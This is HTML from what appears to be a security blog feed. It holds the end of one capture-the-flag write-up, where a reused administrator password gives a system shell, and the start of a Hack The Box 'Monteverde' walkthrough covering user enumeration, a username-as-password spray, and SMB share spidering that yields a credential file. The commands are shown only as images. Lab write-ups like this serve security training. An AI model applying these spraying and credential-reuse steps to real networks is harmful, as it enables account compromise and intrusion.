href="/static/1bb52a940a387d9f03173b8d9a4501bb/6cd33/decode-TempAdmin-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.354430379746837%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+0lEQVR42iXP226CQACEYd6kHgC1YuS07IoCCiKaemqa1iol2Dvf/wX+btuLL3M1k4xhTxS2V2C5FbY40fd29LT+NMOcxATz3R8v3uKqDTI7MFsdEYsKT+ZInROxpDcS9EcRhi23WPEFc9HSlVfGszfC9J1oXpBmOfVnzb1paeuGtrlzu37xcWlY72+Ur9+cbg+SfU3PmWNPYwxZXBDZGVmciZcv7Mot+7Jkna5IpSIRAukHxEGI8kOEG+CMPZ7siI6T0XVzzHCjx5YMvAQjmpW4QYZQJcnqoEeP+KrCCXJdEnSGku5QafLfSOprCutZYumL1lAbCEydv34AKD+GbIwQfuEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="decode TempAdmin password" title="" src="/static/1bb52a940a387d9f03173b8d9a4501bb/6cd33/decode-TempAdmin-password.png" srcset="/static/1bb52a940a387d9f03173b8d9a4501bb/dda05/decode-TempAdmin-password.png 158w, /static/1bb52a940a387d9f03173b8d9a4501bb/679a3/decode-TempAdmin-password.png 315w, /static/1bb52a940a387d9f03173b8d9a4501bb/6cd33/decode-TempAdmin-password.png 366w" sizes="(max-width: 366px) 100vw, 366px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As mentioned in the email archive from the <code class="language-text">Data</code> share, this was the same password as the <code class="language-text">administrator</code> user. So I was able to obtain a system shell with <code class="language-text">psexec.py</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4a4a396b2b82413a0650cb371034f880/6f406/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.15189873417721%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACNklEQVR42nWS63LaUAyE/SZtuBqD7/gCtrGxMQECSZuGTqd9/+fYrmRooJP80OicsfSd1crGLH2EvTrDyl4RlSdsns7Yv/xm/EF7/IXmcIaXbDB2MphujmlQwvJXmHi55u5cYMosNYbP4nDRYiLFfgGLH2dh2RWxWc7OfK0wqbF57+oyzdNgdamrtMZIsj2K+gVxtoOfNAj4gBfXSPI9myuF9My4i3GEh1F4EwEehj7Dw9eRz5o5jJSN9fYVzeMbmt2Z8aaxOfxEtKQdfH3i5BhMEo3+JMbAjNAfh4z5JQfoC3DowhBl6/Y71tsfyNfPqNpXzUHSQtSnxUGhAyp8V0Yg732zA/aotKdAH0ZWHnXkawgsr08KW/EuwNF0QZUZLLdQtXIWlb3RVSXhqj6F4dHwebqFE1Two5rnDYJ4gymbbZ8L8LhFW2A5ZtzklDCbeWQt6FlKyEJBGvTY8KMGBVUtqUQiXu7YUGnDwEwwtFKe03/33kiUUdGYADN9hzF6XI7h0J952qqqgNuVB9yw1ntIH91wreHNa8y8UqED8wK7AyYdUMYtG3pXnZCVT1iuJI4o6V8QNxdFkfrUwT4Dpt1SZvRIGl3+c6JEfHTppygUVZbDRdg5hmy4BQ4+APb5zZCmBb3rxuKCOGZIWMx/UBbjBGtd2D3wc5WGwNr9WQEFxy6qZ9hU7fOhL31fN3xVej/2f9AL2BhbCSb8z4YsEFBG/2TkmaqrdOtl840L2uroH0FvwX8BIGXBACoaBD8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/4a4a396b2b82413a0650cb371034f880/50637/system-shell.png" srcset="/static/4a4a396b2b82413a0650cb371034f880/dda05/system-shell.png 158w, /static/4a4a396b2b82413a0650cb371034f880/679a3/system-shell.png 315w, /static/4a4a396b2b82413a0650cb371034f880/50637/system-shell.png 630w, /static/4a4a396b2b82413a0650cb371034f880/6f406/system-shell.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-monteverde/https://mgarrity.com/hack-the-box-monteverde/Wed, 20 Dec 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e54d876bca4653972bd5183a368f5546/3b67f/monteverde.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABD0lEQVR42mMQkdX+jwuLymn/F5LR/s8rCaFBfHzqQZgBn2Egg6Rl1P9rqmv+l5HV+M8rQdhQrAaKATXxAQ0z1dP631Lj9f/Cct//tSXO/60NgOJS+A3FaqCgrM5/RVnV//GVgf+jDsz8f39eyH/frX3/Y+vD/ytIq/wXAsoTbSDIdh4p3f/mGsr/U5YW/7fZseT/+WkF/w2WzPhfMzHzv4m22n9eKR2crsTqQmGgCyRl1P531vj+P3Sg+f++2Xn/51c6/+/J8vgvIacOlic5DHmAYWipr/l/Yp7N/41dwf8npJv8N9LXAoctyWGIHMsi0hr/9bQ1/0vIaxM0DK+BMJeKyun8F5AGelEOwieUDgH76wy/P7gXwwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Monteverde" title="" src="/static/e54d876bca4653972bd5183a368f5546/50637/monteverde.png" srcset="/static/e54d876bca4653972bd5183a368f5546/dda05/monteverde.png 158w, /static/e54d876bca4653972bd5183a368f5546/679a3/monteverde.png 315w, /static/e54d876bca4653972bd5183a368f5546/50637/monteverde.png 630w, /static/e54d876bca4653972bd5183a368f5546/fddb0/monteverde.png 945w, /static/e54d876bca4653972bd5183a368f5546/3b67f/monteverde.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Monteverde is a Windows machine with an Active Directory environment featuring Azure AD. After enumerating domain users, it can be discovered that a service account has the username set as the password. This grants access to an SMB share that contains credentials for another user, allowing for a shell over WinRM. Once on the system, enumeration can reveal that Azure AD Connect is on the box, this can be leveraged to extract an encrypted password of the replication account which in this instance is the <code class="language-text">administrator</code> user, these credentials can then be used to obtain a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e5418cb070821ada6e0c2dfe760c2e55/a7269/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 86.70886075949367%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAA7DAAAOwwHHb6hkAAAC3UlEQVR42m1UV3bjMBDTUeK4qDeq92I7Tuz0zd7/KFgM5STvbfKBR4vSgABmaMMtTvC7D/jtK4L2AcV4QT0/oT2+oju9Y3/+i7x/gKqOSOo7qPIIO2qxdopfYbTzMyoW9FxLrkX3gOH4hqQ5ISz2miht7pHx2Yk62GH7C2F5BQmHwxuy+oRufkHP39PdO2ISCXE1PFLRATFhBQ1WZopbK8Vqt6xrK8GtuWBtZQthMz4hTEakVFL1ZzTjIyyvRkn7w+EVBde0YixqhBcPcMMObkxQpafRwPZL7pdcSVi0tMNsEmaTClhsklAVR5TdmYdc0O9fUHMN01ET7ahk5xJega2d8ZmwU2zMGEY9XCCkn8U58/LVoAkkBlEukcgBScmmFAd4qkdARDzAY64J38l7J+rZlOnpi6xibof7D23XDXs4AdW4FbYMXLCxqYjqNlaO1TbDDbEyC9zs+NuUPQVjZE4dSdvxGQ1J96c/zHRCnLEx7RlZdacPlEhUftBqonRPZSOdTHB4cMT9MJ1g0rrRsiktu1n3BAv76RkqWwrz+l6r1I0gPn974aAd2Fwt7jnxeHVDQslKCMVmySwL5hWw66JGCFPmFvMAIdBkUa8VuiRb7XKOT6Ftr2h7tQk5NiTrROUoCi8Y2IiEZKl0ueEsck9I5QDTrTlSDcHh9qmYpBunwtrmUNsV55EKpauSk4xMnM4IKN8NOvgxFbGDkmXIrPzPGaRSj9+IbV/NbFJ9JVxIjTib0egMGXzO4pjFtCXDfSs3glYW5Fib/4PXziq/QVIj5MxV8qdAlRUtRuzwlh/v+FLGY0GhseXelqOjx8denjfWN4TU8GmjlqzYALEc8oqJbT8arg2Y9Cyumc9PhT/VGgktK6KU28BimUFRGTCzgOTyLLdByOU+S4aSpycH8mD5JlBSN+s9o+TdjbkpSmMWLzmOJF3UKjZFVEZUL1D5UZOLXen6d+cb3ukK/wDybihZB+heIQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/e5418cb070821ada6e0c2dfe760c2e55/50637/nmap-scan.png" srcset="/static/e5418cb070821ada6e0c2dfe760c2e55/dda05/nmap-scan.png 158w, /static/e5418cb070821ada6e0c2dfe760c2e55/679a3/nmap-scan.png 315w, /static/e5418cb070821ada6e0c2dfe760c2e55/50637/nmap-scan.png 630w, /static/e5418cb070821ada6e0c2dfe760c2e55/a7269/nmap-scan.png 740w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: MEGABANK.LOCAL</li> <li>hostname: MONTEVERDE</li> </ul> <p>I wasn't able to access any shares from a null session, but I was able to list domain users:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a96a2e1b3131cae7ce2ee6aa4e955e86/2a205/domain-users.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 64.55696202531645%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACk0lEQVR42k2T2ZKcOBRE+RR310ZRxaIVVBJbURu92mH3dIzDL/P/H5GT0O2wHzKQkDjKvFdEKz1i7X5Q3yH8iMvjO4bxDaeHd4ThFVX/iHXqsMw9lmnAan/g/EObbJL/HHvE3BMVzT/IdAsTbqgJaE9foQ8X5OUAW4/obt9huZbaAap7Rc11WZ3m9UQ02MkW26LGXnXITI9o59+RFAHGE3h8mYGCH0h3nh3eXn+iah6wocvSXdBw3fgrSh4mCJjM7GUzAyd4lIRfiPcO5nBFMwEJUQRaHtCfv+Hr2398/0yghyfsfHlBqC9oW0IJVjx4y+iLjcByVyJa62foXMKaGqf+jLY54WAOcDagq4+4XV/Q+A4qE/h3KPDWSRxLg6EyqKSGyhV2SYG7RYb7jUSkVMC5Uji5Eg91hYt33Gxx9RZjqPDcBdx8iZuTePIKrdHorUSjBHqdUwVqJVEJBc1Do9Sy4KmG0QHh0OPgekjhIKWHq44Yjg98tpC5xniQ/FjASwK1QpaWWGwd7mKH+7jC3apAtBBP+LLWiLMauRmQ6wGbfWBdGs5PcO0LC37kHoMrk1yozlg0VNAWWVYSRuBa8KkQrYorlhuDXR4g9BGF7rFlA5LpANWjCiMy0WK1sThaTWeGDi1MQQlLh9WsCbhI2JQlgQsCkyygYOtzKt57QgMyjkte9pTAJYEd61d/AlVu4ZTFnrHvt58Op6asivEP8LdD/g1J+jF39SMy2c0pTqWeoYGgWhmUBK8TuptcxgRPNVzJJwI1I9dQlheadUzocJoLjkP3PEefgKPTrCG7bAzjT9fGzs34HXvBcbRM+9lhvHPYs247apO4+bIn+YfLye0ytrDCwOSGHf+InE9x/wZuK/wPO3ipJAMRp00AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="domain users" title="" src="/static/a96a2e1b3131cae7ce2ee6aa4e955e86/50637/domain-users.png" srcset="/static/a96a2e1b3131cae7ce2ee6aa4e955e86/dda05/domain-users.png 158w, /static/a96a2e1b3131cae7ce2ee6aa4e955e86/679a3/domain-users.png 315w, /static/a96a2e1b3131cae7ce2ee6aa4e955e86/50637/domain-users.png 630w, /static/a96a2e1b3131cae7ce2ee6aa4e955e86/2a205/domain-users.png 762w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the output into a file called <code class="language-text">crackmapexec-users</code> and used <code class="language-text">awk</code> to extract just the usernames and wrote it into a file called <code class="language-text">users</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7040e0a9978194941c7afb67ef79dbe1/3376a/users-list.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.810126582278485%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABH0lEQVR42n3P23KCMBSFYV5FokA4KCCBcAqgM2LrofWu7/8iq0vq2JbO9OK7IOz9Byw3GbBSV0h1Rpj1GIYRw+5EZ/RUmRcUzQFepBGQH5UI0x7b8oA43yNWA+S6gRdqOH4Ga7k2WDK4qW7wOWg6BveXKdjtLqi7E/J6ZLCEDAu4QQG5qRnqEaUtooSxqIIbllhJBrP2jMy8oxs/kOojvHUNPzYIEoo7annWwPYKUhBkuxkWDrmKtrCdFItVApus4XCbfivkouNrLuRcUE/iYSmL3+5xxoSz/ZrhnuCllqpGtLsrg4Y3ZRzMH4pvs9jzEr4TXgkh7/TEqswJ/f4NwaZ9DP0T/Hnm6Ynw9DM2Bcv2Fbo5zr5uFvzz/B2dBz8BjUzcCOgxWHAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="users list" title="" src="/static/7040e0a9978194941c7afb67ef79dbe1/50637/users-list.png" srcset="/static/7040e0a9978194941c7afb67ef79dbe1/dda05/users-list.png 158w, /static/7040e0a9978194941c7afb67ef79dbe1/679a3/users-list.png 315w, /static/7040e0a9978194941c7afb67ef79dbe1/50637/users-list.png 630w, /static/7040e0a9978194941c7afb67ef79dbe1/3376a/users-list.png 694w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Checking the password policy showed that there was no lockout threshold:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3987d58f80b8121f5afc1792dfd67743/e1355/password-policy.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACS0lEQVR42jWT6XKbQBCEeZPYjhASEuyyB8t9WKADIUuyHCeuOHLK7/8OnQE5P7pmKOCje2axbNHCji6kZ/jRGqvtC6rNBY9Uk6qHLnawFxEmfkLKMJmHsN2bpoMWhu4bOHTf8VNYfv4TTNXQyRrF6oS6PVO/gQgbxMUebfeKpNzD1w1kfUHZnBCY1fjOgmfwggyub+BTZbqCJVcfcBYxfFERoEOUd/Co92UFk+1Gx4qcT8gNzxqUjz2SfAuTrgmSYraMCEjuFhouJ4dO+o47J8QyKBETLMo6+nJB0BJhskW7e4WK17AdhWMu0CUBnlKObczQJwyaScwo8tKL4MwlrDDt4fsac5ZBmmaUS7Nw/Zz6lsZwBKf4k5lGLBUkE9BcQjENRlEFNwgYVaYwnzNYbnaFTQ8zWVOcI/L6ieZSgatHZNUBh+crOd/j3lYwgcYmUtjFGo3RaGOFhq4POcFmHA/EsSbhGx4cPUZMaQkJacnLcaZD/G3/RvPa4s7WCMjRJZc4pBJPmUSXEjxReCklCuGN27bs9HME/nc4yBf16LCg/vTjE2nZ49tEwfNuwJ5A56/ajdIIGcf9VBAwvn4BqxGQU0yPHHL6QFr06I9/RqcPU4VUa9TmpsqESFSIWIcIlYERIRyHD8D3G5AiDrC8vAGHyIOzw/kPHZ893KnEX9rqb8NwpQ1/xBzvEcevkOON+pzAHm3asvUzvhNwSX+BiTfQdOZcL6M5FnT+WlTNGUHYYk4OjyrAQQZj3QuBkxLopUC0UHT0ItzPIvwDrQZuVLA+I+EAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="password policy" title="" src="/static/3987d58f80b8121f5afc1792dfd67743/50637/password-policy.png" srcset="/static/3987d58f80b8121f5afc1792dfd67743/dda05/password-policy.png 158w, /static/3987d58f80b8121f5afc1792dfd67743/679a3/password-policy.png 315w, /static/3987d58f80b8121f5afc1792dfd67743/50637/password-policy.png 630w, /static/3987d58f80b8121f5afc1792dfd67743/e1355/password-policy.png 763w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the same <code class="language-text">users</code> list for both usernames and passwords, I ran a password spray to see if any accounts had the username set as the password. <code class="language-text">crackmapexec</code> will try every username in the list with every password which isn't necessary in this case since only one password needs to be attempted with the corresponding username, but since there wasn't a lockout threshold it didn't cause any issues.</p> <p>A valid password was found for <code class="language-text">SABatchJobs</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1332eb637446e3cfabd41e5aa306f121/2f676/password-spray.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.848101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVR42lWR63KCMBCFeZaKraJySRDCHQIIilWwnU7/9/2f4fSAM53pjzO72cme/bIxTNHDDEasZA9PNSjbCZm+QfefiMor8nbExsuwsROsDzFedgqr/VOmHcPcR1hZ4Z8ML3vAiQccqwkFzdrha4kpTcNiwOP7B5o1VVzgpVeEzQNZN0HmZ4i0h6ta2EcN26/gBDWMsLjjqGqkpKlJNdPlzR0Jo6LhHLOGlG4GhzRJ0qHsPhDmF4iohYw7+Kx5NPaZGzK5QoQ1TUZoXqxOj2XaMpGTg6yHjE7LU7drAc9NWTvDC/TSJ9VTLs9+fIIhogtcWSCt3lE2E/KaxJzkEd9yUkT5gIAEphVh9yrhi3JZheC+/xn6OURQcIeqY6IRs7GoRxrf4JPIcjJs7ZRNDS9rGips3iRsfsRMcyDpnrJFvmjO59ovFDvKkDTUQjQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="password spray" title="" src="/static/1332eb637446e3cfabd41e5aa306f121/50637/password-spray.png" srcset="/static/1332eb637446e3cfabd41e5aa306f121/dda05/password-spray.png 158w, /static/1332eb637446e3cfabd41e5aa306f121/679a3/password-spray.png 315w, /static/1332eb637446e3cfabd41e5aa306f121/50637/password-spray.png 630w, /static/1332eb637446e3cfabd41e5aa306f121/2f676/password-spray.png 737w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e3aa883abeb1fd8d3adf4550cb1ddf1a/2059a/SABatchJobs-logon-success.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 21.51898734177215%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7UlEQVR42iWQ226DMBBE+ZZILQkIbK7BwdgGQkLTRm3Vh1b9//84XdKH0Wqk1dmZjcrwQ3Gc6cc7fvlgmN/R4vfKyjxjwitp5dnFNUV+og1vKHNBi8p+Je+Wh1dmIW0mIu2+0c1IN9xo7YpuJw4CS/SAkgXjbiSl4xBX2Grgaq+EJog8Uzvia8dszkzdzFBYori5E6cdeRUoJVEmc5/3JFvCdn4A08ITP1e4zHAWoKs9g8C9QG1pMcpgtaFTPVE7/0q6lbB8Ml2/UNXIPvsHqnriaF8E6Ng9lSg5XEuLXFps2l6SCTzRVnZO8qaeP1+GhQ8G9NzuAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="SABatchJobs logon success" title="" src="/static/e3aa883abeb1fd8d3adf4550cb1ddf1a/50637/SABatchJobs-logon-success.png" srcset="/static/e3aa883abeb1fd8d3adf4550cb1ddf1a/dda05/SABatchJobs-logon-success.png 158w, /static/e3aa883abeb1fd8d3adf4550cb1ddf1a/679a3/SABatchJobs-logon-success.png 315w, /static/e3aa883abeb1fd8d3adf4550cb1ddf1a/50637/SABatchJobs-logon-success.png 630w, /static/e3aa883abeb1fd8d3adf4550cb1ddf1a/2059a/SABatchJobs-logon-success.png 767w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I listed SMB shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/edd24a3ec2cf8e3711aeb775bae3fdbb/78bef/list-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.10126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAACD0lEQVR42kWSWXLjMAxEdZQssqxd1EZSu9fYHsdxJTP5yNz/Hm8gJVXzgQIpQo1Gox23vOLqd7ziQDv9YnN8l/ig294YtleKesQPa54DQ5hoIgk/qlnFBjfWuH4pb3KPrHxrcMrhjmovTKdPLm9f7E6/GXd37HDl9f6X0+UDbXbk3Su7l3fG6SRNJgq7p5TIyhFVdFRmQ1bvcNZxxzo0FPpArvdEaiDMeqJswPQXyuaFddSwygeUnE13RukdSn5eatNWarsl+2mH8xyNeALYb9/oNq9LYVpIt2rL5fbF/vxHxmkpSktnO7ykI85aJmPpi4J1UFGqCp0VPDwnOG484AWadrxihdEMtgCWWw7nT8b9fQE0quCoFb5fCYgmTzVpZnHDBlNohiIjSwqcVdSzkoJ5PNOeSfMNsZpIBHReUL+5sQqFYVpjc02tDEliUJnmKbA8Bg25AGmlhLnF8UUf19c/zCaCpMcXXedcmiN5tZeGDXE0b9Tw6FmefMvD2sp25SxvSgDrTBGlAujFPwxFbN2eSBaGo+SJzWFm+LYwNKLTXlcijyWKDAcrVgmFoYC3Zc22jKlEFmdrGwLxVWlfFkaxbHfe8AzaT7dFV1dY1KrmaCpWwjIUz031f8BZw7EqyaIMJ8uaRWRViRVkEWEyjzvboKduTkuTeeRUDG3ymqe1IRBXWAFxg++xvfA75vs/JtZD5gUD+5sAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list shares" title="" src="/static/edd24a3ec2cf8e3711aeb775bae3fdbb/50637/list-shares.png" srcset="/static/edd24a3ec2cf8e3711aeb775bae3fdbb/dda05/list-shares.png 158w, /static/edd24a3ec2cf8e3711aeb775bae3fdbb/679a3/list-shares.png 315w, /static/edd24a3ec2cf8e3711aeb775bae3fdbb/50637/list-shares.png 630w, /static/edd24a3ec2cf8e3711aeb775bae3fdbb/78bef/list-shares.png 771w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">SABatchJobs</code> had read access on <code class="language-text">azure_uploads</code> and <code class="language-text">users$</code>, so I used <code class="language-text">crackmapexec</code> to spider the shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3028d9f1140837b6b20e43dce45cc4f2/d8724/spider_plus.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJ0lEQVR42h2Q2U6DQBSGeQ+jJl2EUqHDvpVCWVutdNPEO+Od7/8Cnwcu/sycmZN/05ZOwzI48xJdsKOeurtT1lc5P0nLD/bVG45K0M2YlbXFczOUyjCdgk1QCxp0K2O58tHtDE1lnyi/wk8P5NV5IoyzI0HSk+bvdMcv0uyAEzYEu4GmveLJ3Qlb3LjHk72R1PELVLhHW8RX5uJyvcnx43bC2t7yKrMXtSJymQQX6xQz7ElExJMknpAF6VFIRuIOV3b1dYD22P/xUP1iyUdZDeTlgC1xlL8nLU4Mtx8ScTgzJJZ3keiJOD+xLc8kuxPOSCRVjJgbEdpz/s1TcsNUBZHYDwWTQzU67ijbO650NV9lLOx+6jGUesZK/PiA5VZs/BpD3mdGzD+fMadn4KpyRwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="spider_plus" title="" src="/static/3028d9f1140837b6b20e43dce45cc4f2/50637/spider_plus.png" srcset="/static/3028d9f1140837b6b20e43dce45cc4f2/dda05/spider_plus.png 158w, /static/3028d9f1140837b6b20e43dce45cc4f2/679a3/spider_plus.png 315w, /static/3028d9f1140837b6b20e43dce45cc4f2/50637/spider_plus.png 630w, /static/3028d9f1140837b6b20e43dce45cc4f2/d8724/spider_plus.png 769w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">users$</code> share contained an interesting file, <code class="language-text">mhope/azure.xml</code>:</p> <div class="gatsby-highlight" data-language="json"><pre class="language-json"><code class="language-json"><span class="token property">"users$"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"mhope/azure.xml"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2020-01-03 08:41:18"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2020-01-03 08:39:53"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2020-01-03 09:59:24"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"1.18 KB"</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span></code></pre></div> <p>I connected to the share with <code class="language-text">smbclient</code> and downloaded it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9cd2b5cd2c2271e76928d01d51c5dd63/e1355/get-azure-xml.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 49.36708860759494%; position: relative; bottom: 0; left: 0; background-image: 